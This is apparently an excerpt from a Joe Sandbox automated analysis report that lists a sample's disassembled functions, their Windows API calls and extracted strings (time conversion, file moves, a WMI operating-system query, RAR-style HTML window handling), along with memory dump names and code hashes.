Instruction Fuzzy Hash: 7521B431604205BBE3316A69ED49F7B3FBCFB5AB45F010414FAC499098CB6FA8019771

Function 0101FD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,27EE1FB8,00000001,00000000,00000000,?,?,0100AF6C,ROOT\CIMV2), ref: 0101FD99
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,0100AF6C,ROOT\CIMV2), ref: 0101FE14
SysAllocString.OLEAUT32(00000000), ref: 0101FE1F
_com_issue_error.COMSUPP ref: 0101FE48
_com_issue_error.COMSUPP ref: 0101FE52
GetLastError.KERNEL32(80070057,27EE1FB8,00000001,00000000,00000000,?,?,0100AF6C,ROOT\CIMV2), ref: 0101FE57
_com_issue_error.COMSUPP ref: 0101FE6A
GetLastError.KERNEL32(00000000,?,?,0100AF6C,ROOT\CIMV2), ref: 0101FE80
_com_issue_error.COMSUPP ref: 0101FE93

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
String ID:
API String ID: 1353541977-0
Opcode ID: fc9adad3dd5cad7c93487d85bdc7041872b68f4c853c29dd5006a78a51973ceb
Instruction ID: bf140e08184431db7b974a15e5e8e20b8ca89c14d803a2490dde74f185a75901
Opcode Fuzzy Hash: fc9adad3dd5cad7c93487d85bdc7041872b68f4c853c29dd5006a78a51973ceb
Instruction Fuzzy Hash: 3A411B71A00217ABDB10DF68C844BEFBBE9FB48B10F104269F995EB284D73D9504C7A0

Function 0100AF24 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 210COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0100AF29

Strings

Windows 10, xrefs: 0100B0C2
ROOT\CIMV2, xrefs: 0100AF5C
SELECT * FROM Win32_OperatingSystem, xrefs: 0100AFCA
WQL, xrefs: 0100AFDC
Name, xrefs: 0100B0B0

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: H_prolog
String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
API String ID: 3519838083-3505469590
Opcode ID: 2147d638cd8158ff0c209cae10e17e6839a91c1f03de55c6ec7906e5e6d3b79b
Instruction ID: 7207fa42f4e8cad32a68352760d62e6085b9f82051d3e727763a4dab0f4027f9
Opcode Fuzzy Hash: 2147d638cd8158ff0c209cae10e17e6839a91c1f03de55c6ec7906e5e6d3b79b
Instruction Fuzzy Hash: 5F717F74B00219EFEB25DFA5C8959AEBBB9FF88710F04015DE596AB290CB356D01CB50

Function 01009382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 01009387
GetLongPathNameW.KERNEL32(?,?,00000800), ref: 010093AA
GetShortPathNameW.KERNEL32(?,?,00000800), ref: 010093C9

Part of subcall function 0100C29A: _wcslen.LIBCMT ref: 0100C2A2

Part of subcall function 01011FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0100C116,00000000,.exe,?,?,00000800,?,?,?,01018E3C), ref: 01011FD1

_swprintf.LIBCMT ref: 01009465

Part of subcall function 01004092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 010040A5

MoveFileW.KERNEL32(?,?), ref: 010094D4
MoveFileW.KERNEL32(?,?), ref: 01009514

Strings

rtmp%d, xrefs: 0100944E

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
String ID: rtmp%d
API String ID: 3726343395-3303766350
Opcode ID: 6089b2336391db8c68cac2eb6113e2b63ec04640b8ec5e58ef23cd54113f1bd4
Instruction ID: 6c871d4ed023099e9c59116efca6dfc5708b24ac7b699d2667ab094f29e3e869
Opcode Fuzzy Hash: 6089b2336391db8c68cac2eb6113e2b63ec04640b8ec5e58ef23cd54113f1bd4
Instruction Fuzzy Hash: BE41B471900259A6FF22EB61CC44EDE737CAF54349F0048E5A6CDE3082DB398BC88B60

Function 01011218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 0101122E

Part of subcall function 0100B146: GetVersionExW.KERNEL32(?), ref: 0100B16B

FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 01011251
FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 01011263
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 01011274
SystemTimeToFileTime.KERNEL32(?,?), ref: 01011284
SystemTimeToFileTime.KERNEL32(?,?), ref: 01011294
FileTimeToSystemTime.KERNEL32(?,?,?), ref: 010112CF
__aullrem.LIBCMT ref: 01011379

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
String ID:
API String ID: 1247370737-0
Opcode ID: fb1a626bf786737577eb16819ca2564bb2fed4b38167c4f18d606bcfc70ea8af
Instruction ID: c58816a347762b16a986687b2ae2cdc61769bce80be2144e975bca92625e5424
Opcode Fuzzy Hash: fb1a626bf786737577eb16819ca2564bb2fed4b38167c4f18d606bcfc70ea8af
Instruction Fuzzy Hash: CC4107B1508306AFC754DF65C8849ABBBF9FF88214F00892EF6D6C6204E739E559CB52

Function 01002210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 01002536

Part of subcall function 01004092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 010040A5

Part of subcall function 010105DA: _wcslen.LIBCMT ref: 010105E0

Strings

xc%u, xrefs: 0100275A
;%u, xrefs: 01002523
x%u, xrefs: 010026FD

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: __vswprintf_c_l_swprintf_wcslen
String ID: ;%u$x%u$xc%u
API String ID: 3053425827-2277559157
Opcode ID: 4308e38f9dbd4e020f9c28d07df30d2ff0e43c7d2a94fb945472a349a3545230
Instruction ID: b00bfddbf71078920fbd15b6587dc51bc22943a1d932c61db0b363edee86153a
Opcode Fuzzy Hash: 4308e38f9dbd4e020f9c28d07df30d2ff0e43c7d2a94fb945472a349a3545230
Instruction Fuzzy Hash: 35F119706043429BFB17EB28C598BFE7BDA5F94300F0845BDEEC69B2C2CB6495458762

Function 01019CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 01019D0A

Strings

>, xrefs: 01019D4B
<br>, xrefs: 01019DFE
</p>, xrefs: 01019DE8
<style>, xrefs: 01019E30
</style>, xrefs: 01019E52

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: _wcslen
String ID: </p>$</style>$<br>$<style>$>
API String ID: 176396367-3568243669
Opcode ID: 02cddaca2c61554bfc2140857eb0537ec81df76d8ebba31a667aa26f9be591c7
Instruction ID: 01e22e2e6d2abbea84964a27813895f95d7ba3ef1aa2a810036fd3d266d65a0b
Opcode Fuzzy Hash: 02cddaca2c61554bfc2140857eb0537ec81df76d8ebba31a667aa26f9be591c7
Instruction Fuzzy Hash: 50515A2670032391EB746A6DD8317B673E4DFA0758F99045EEAC18B1C8FB6D88818261

Function 0102F68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0102FE02,00000000,00000000,00000000,00000000,00000000,?), ref: 0102F6CF
__fassign.LIBCMT ref: 0102F74A
__fassign.LIBCMT ref: 0102F765
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0102F78B
WriteFile.KERNEL32(?,00000000,00000000,0102FE02,00000000,?,?,?,?,?,?,?,?,?,0102FE02,00000000), ref: 0102F7AA
WriteFile.KERNEL32(?,00000000,00000001,0102FE02,00000000,?,?,?,?,?,?,?,?,?,0102FE02,00000000), ref: 0102F7E3

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 9e3cb9afe3e8fee8ea54653eafd8b524151f3635baf79342708bf1779dd7ee4b
Instruction ID: 65a1d511bb19669f7df425ab9cb1dcddc75edcf7d8d28d17e0bd504c170005a6
Opcode Fuzzy Hash: 9e3cb9afe3e8fee8ea54653eafd8b524151f3635baf79342708bf1779dd7ee4b
Instruction Fuzzy Hash: EF51B6B1D0025A9FDB10CFA8D885AEEFBF8FF09310F14415AE995E7251E771A940CBA0

Function 01022900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 01022937
___except_validate_context_record.LIBVCRUNTIME ref: 0102293F
_ValidateLocalCookies.LIBCMT ref: 010229C8
__IsNonwritableInCurrentImage.LIBCMT ref: 010229F3
_ValidateLocalCookies.LIBCMT ref: 01022A48

Strings

csm, xrefs: 010229DD

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 06bfc4f05fc9d4475fb177d7d609e6c3a67f46acfdb95a9c46d0eb4ae11b0a87
Instruction ID: f3f7b3ca64b21dfbc705c6b47e95f3eb92a020606cac315b7f150a5e2c7df5da
Opcode Fuzzy Hash: 06bfc4f05fc9d4475fb177d7d609e6c3a67f46acfdb95a9c46d0eb4ae11b0a87
Instruction Fuzzy Hash: 1941A230A00229AFCF10DFACC880A9EBFF5BF45364F1481A5E895AB392D775D955CB90

Function 01019ED5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000000), ref: 01019EEE
GetWindowRect.USER32(?,00000000), ref: 01019F44
ShowWindow.USER32(?,00000005,00000000), ref: 01019FDB
SetWindowTextW.USER32(?,00000000), ref: 01019FE3
ShowWindow.USER32(00000000,00000005), ref: 01019FF9

Strings

RarHtmlClassName, xrefs: 01019FA5

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: Window$Show$RectText
String ID: RarHtmlClassName
API String ID: 3937224194-1658105358
Opcode ID: 68075019b895c002f67029064c5468feb9d67fa10530555958e737b20652f900
Instruction ID: 0ad53bd097c111e328bfe78f90bff9c6bd1d125c2d8257d4577bc6f76f565399
Opcode Fuzzy Hash: 68075019b895c002f67029064c5468feb9d67fa10530555958e737b20652f900
Instruction Fuzzy Hash: 2741BF32504210EFDB625F689C48B6BBFB8FF48755F004599F9C99E05ACB39D908CBA1

Function 01019955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0101995E
_wcslen.LIBCMT ref: 01019993

Strings

, xrefs: 010199B0
<br>, xrefs: 010199DF
 , xrefs: 01019A21
<style>body{font-family:"Arial";font-size:12;}</style>, xrefs: 01019987

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: _wcslen
String ID: $ $<br>$<style>body{font-family:"Arial";font-size:12;}</style>
API String ID: 176396367-3743748572
Opcode ID: 20bc620946a266f847a315b57d534d067da2229c7d0edcda8da3f8cad4dbfc4f
Instruction ID: 38924c30123a56f2ce046835b1cd32376b6faf3910bc98440ca2b0d0564023b0
Opcode Fuzzy Hash: 20bc620946a266f847a315b57d534d067da2229c7d0edcda8da3f8cad4dbfc4f
Instruction Fuzzy Hash: EC31503364434655DE31AF589C51BBB73E8FB80714F90441EF8C68B284FA6CA94883E1

Function 0102C8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0102C868: _free.LIBCMT ref: 0102C891

_free.LIBCMT ref: 0102C8F2

Part of subcall function 01028DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0102C896,01033A34,00000000,01033A34,00000000,?,0102C8BD,01033A34,00000007,01033A34,?,0102CCBA,01033A34), ref: 01028DE2
Part of subcall function 01028DCC: GetLastError.KERNEL32(01033A34,?,0102C896,01033A34,00000000,01033A34,00000000,?,0102C8BD,01033A34,00000007,01033A34,?,0102CCBA,01033A34,01033A34), ref: 01028DF4

_free.LIBCMT ref: 0102C8FD
_free.LIBCMT ref: 0102C908
_free.LIBCMT ref: 0102C95C
_free.LIBCMT ref: 0102C967
_free.LIBCMT ref: 0102C972
_free.LIBCMT ref: 0102C97D

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction ID: d49eef682295cc6da29031b70fd06714aba967410b75ace28d1d2930ad781325
Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction Fuzzy Hash: ED111F71580B26AAF520B7B1CD05FCF7BEC9F25B10F508C16F2DD66061DAA5B509CB50

Function 0101E5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0101E669,0101E5CC,0101E86D), ref: 0101E605
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0101E61B
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0101E630

Strings

AcquireSRWLockExclusive, xrefs: 0101E615
ReleaseSRWLockExclusive, xrefs: 0101E625
KERNEL32.DLL, xrefs: 0101E600

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 667068680-1718035505
Opcode ID: e8f6cb3d95cbfd10081c7595d26ca8b5f1ead1182bb08c27738d45fb239e09ed
Instruction ID: eed29a717fad5c5207547d9515824649d79a3a4fc0f0b95e3132f7e2b72a8293
Opcode Fuzzy Hash: e8f6cb3d95cbfd10081c7595d26ca8b5f1ead1182bb08c27738d45fb239e09ed
Instruction Fuzzy Hash: 3AF0C2317402229B5B734E69DC94A6E76CC6F8D6D13400CB9EEC5DB11DEB2DC4909B90

Function 01028900 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0102891E

Part of subcall function 01028DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0102C896,01033A34,00000000,01033A34,00000000,?,0102C8BD,01033A34,00000007,01033A34,?,0102CCBA,01033A34), ref: 01028DE2
Part of subcall function 01028DCC: GetLastError.KERNEL32(01033A34,?,0102C896,01033A34,00000000,01033A34,00000000,?,0102C8BD,01033A34,00000007,01033A34,?,0102CCBA,01033A34,01033A34), ref: 01028DF4

_free.LIBCMT ref: 01028930
_free.LIBCMT ref: 01028943
_free.LIBCMT ref: 01028954
_free.LIBCMT ref: 01028965

Strings

x)J, xrefs: 01028900, 0102890F, 01028924

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: x)J
API String ID: 776569668-2012010399
Opcode ID: 638b2eb3bf9cc3d55d7349f90709da70725f134a2aaa68e9df8c33ecebc40b6e
Instruction ID: 7ff9524b0f86b1994407ebefd027f95ceb16a152c988fe3a02356dbfe374467e
Opcode Fuzzy Hash: 638b2eb3bf9cc3d55d7349f90709da70725f134a2aaa68e9df8c33ecebc40b6e
Instruction Fuzzy Hash: 3AF03479911233ABA666BF28F8004493FE9FB287203044A07F5D89227DC77F4959DB91

Function 0101146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32(?,?), ref: 010114C2

Part of subcall function 0100B146: GetVersionExW.KERNEL32(?), ref: 0100B16B

LocalFileTimeToFileTime.KERNEL32(?,?), ref: 010114E6
FileTimeToSystemTime.KERNEL32(?,?), ref: 01011500
TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 01011513
SystemTimeToFileTime.KERNEL32(?,?), ref: 01011523
SystemTimeToFileTime.KERNEL32(?,?), ref: 01011533

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: aa70cca98942cbb61df05f87876cba04bae89d46a05a761bdc057f26395169cc
Instruction ID: f583d2db3ec9669b8f681982f0b0e9978481b5ab90780b13c27df6cb8ad16a9f
Opcode Fuzzy Hash: aa70cca98942cbb61df05f87876cba04bae89d46a05a761bdc057f26395169cc
Instruction Fuzzy Hash: 4231E779108346ABC704DFA8C88499BBBF8BF98614F444A1EF999C3210E734D549CBA6

Function 01022AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,01022AF1,010202FC,0101FA34), ref: 01022B08
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 01022B16
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 01022B2F
SetLastError.KERNEL32(00000000,01022AF1,010202FC,0101FA34), ref: 01022B81

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: aec652aad98712bc9504fbb49be1991999bf2b285a3eeb7c4c2c70fad8b446df
Instruction ID: bb55ba9f954199ee4e3bc201621d1030e3cecd48d3f3146a1eda6f64354b6752
